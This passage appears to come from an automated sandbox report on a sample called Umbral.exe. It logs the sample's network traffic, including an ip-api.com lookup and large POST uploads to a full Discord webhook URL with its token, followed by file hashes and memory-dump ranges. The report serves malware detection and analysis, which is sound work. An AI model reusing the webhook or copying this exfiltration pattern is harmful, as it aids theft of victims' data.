      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 550329
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0604C250DE064F60A496C03ED14B1329 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • GET (US)
      https://tse1.mm.bing.net/th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 731444
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 23B7B9F9D598411E94DA65FFE8EB200D Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:47Z
      date: Tue, 25 Mar 2025 19:57:47 GMT
    • DNS (US)
      c.pki.goog
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.179.227
    • GET (GB)
      http://c.pki.goog/r/r1.crl
      Remote address:
      142.250.179.227:80
      Request
      GET /r/r1.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 304 Not Modified
      Date: Tue, 25 Mar 2025 19:48:15 GMT
      Expires: Tue, 25 Mar 2025 20:38:15 GMT
      Age: 599
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Cache-Control: public, max-age=3000
      Vary: Accept-Encoding
    • 142.250.187.227:443
      https://gstatic.com/generate_204
      tls, http
      Umbral.exe
      724 B
      4.9kB
      8
      8

      HTTP Request

      GET https://gstatic.com/generate_204

      HTTP Response

      204
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=225545
      http
      Umbral.exe
      309 B
      540 B
      5
      4

      HTTP Request

      GET http://ip-api.com/json/?fields=225545

      HTTP Response

      200
    • 150.171.27.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      tls, http2
      2.0kB
      9.4kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=

      HTTP Response

      204
    • 162.159.128.233:443
      https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw
      tls, http
      Umbral.exe
      444.3kB
      10.6kB
      340
      78

      HTTP Request

      POST https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw

      HTTP Response

      204

      HTTP Request

      POST https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw

      HTTP Response

      200
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
      7.4kB
      18
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
      7.4kB
      18
      13
    • 150.171.27.10:443
      https://tse1.mm.bing.net/th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      tls, http2
      152.8kB
      4.4MB
      3218
      3208

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388161_17PDPNJBHCJYF0MEC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Response

      200
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
      7.4kB
      18
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.4kB
      7.4kB
      18
      13
    • 142.250.179.227:80
      http://c.pki.goog/r/r1.crl
      http
      476 B
      394 B
      6
      4

      HTTP Request

      GET http://c.pki.goog/r/r1.crl

      HTTP Response

      304
    • 8.8.8.8:53
      gstatic.com
      dns
      Umbral.exe
      57 B
      73 B
      1
      1

      DNS Request

      gstatic.com

      DNS Response

      142.250.187.227

    • 8.8.8.8:53
      ip-api.com
      dns
      Umbral.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      148 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      discord.com
      dns
      Umbral.exe
      57 B
      137 B
      1
      1

      DNS Request

      discord.com

      DNS Response

      162.159.128.233
      162.159.138.232
      162.159.135.232
      162.159.136.232
      162.159.137.232

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
      170 B
      1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      c.pki.goog
      dns
      56 B
      107 B
      1
      1

      DNS Request

      c.pki.goog

      DNS Response

      142.250.179.227

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      efa4168b73a5e8ae56d49bcac4d67861

      SHA1

      b3fe6b2d9fc05ad7892a2c8b96914764336b3067

      SHA256

      7aab157fba3a543647a38cc8729ffb962a58cc2093d94566c9e68ff73d134dca

      SHA512

      a1f305eac9c73c951f22e76f3904c1c6bb518b12d8a74bbea544c845f3d592e7915ec47d6531a3a4e669f6ab12311f3a632ff47a68f36370111d1c82cf8b6e99

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      c65738617888921a153bd9b1ef516ee7

      SHA1

      5245e71ea3c181d76320c857b639272ac9e079b1

      SHA256

      4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

      SHA512

      2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      276798eeb29a49dc6e199768bc9c2e71

      SHA1

      5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

      SHA256

      cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

      SHA512

      0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      d8a781a8d47e148c742681deaa63ac8d

      SHA1

      49594c22cc6183605b96b715a0c00c1bf1bbb468

      SHA256

      994622f9d048bce32fd23dec62a532b965883a169722f36ce72a639e29b8303c

      SHA512

      f32989be9a903764c4ed3b8ab4e61a677ca4d37031200530164d192c25c269143cb127a73380ea0d88ac81f1a3a7c141d77fbd74c211c9d969bf2af9202e7fbe

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_chfmu3n4.qtf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4004-70-0x000001821EF70000-0x000001821EF7A000-memory.dmp

      Filesize

      40KB

    • memory/4004-34-0x000001821EE60000-0x000001821EE7E000-memory.dmp

      Filesize

      120KB

    • memory/4004-90-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

    • memory/4004-89-0x000001821F040000-0x000001821F1E9000-memory.dmp

      Filesize

      1.7MB

    • memory/4004-2-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

    • memory/4004-32-0x000001821EEE0000-0x000001821EF56000-memory.dmp

      Filesize

      472KB

    • memory/4004-33-0x000001821EE90000-0x000001821EEE0000-memory.dmp

      Filesize

      320KB

    • memory/4004-71-0x000001821EFA0000-0x000001821EFB2000-memory.dmp

      Filesize

      72KB

    • memory/4004-1-0x00000182047C0000-0x0000018204800000-memory.dmp

      Filesize

      256KB

    • memory/4004-0-0x00007FF9B00B3000-0x00007FF9B00B5000-memory.dmp

      Filesize

      8KB

    • memory/6060-14-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

    • memory/6060-15-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

    • memory/6060-13-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB

    • memory/6060-12-0x000001EB78F20000-0x000001EB78F42000-memory.dmp

      Filesize

      136KB

    • memory/6060-18-0x00007FF9B00B0000-0x00007FF9B0B71000-memory.dmp

      Filesize

      10.8MB
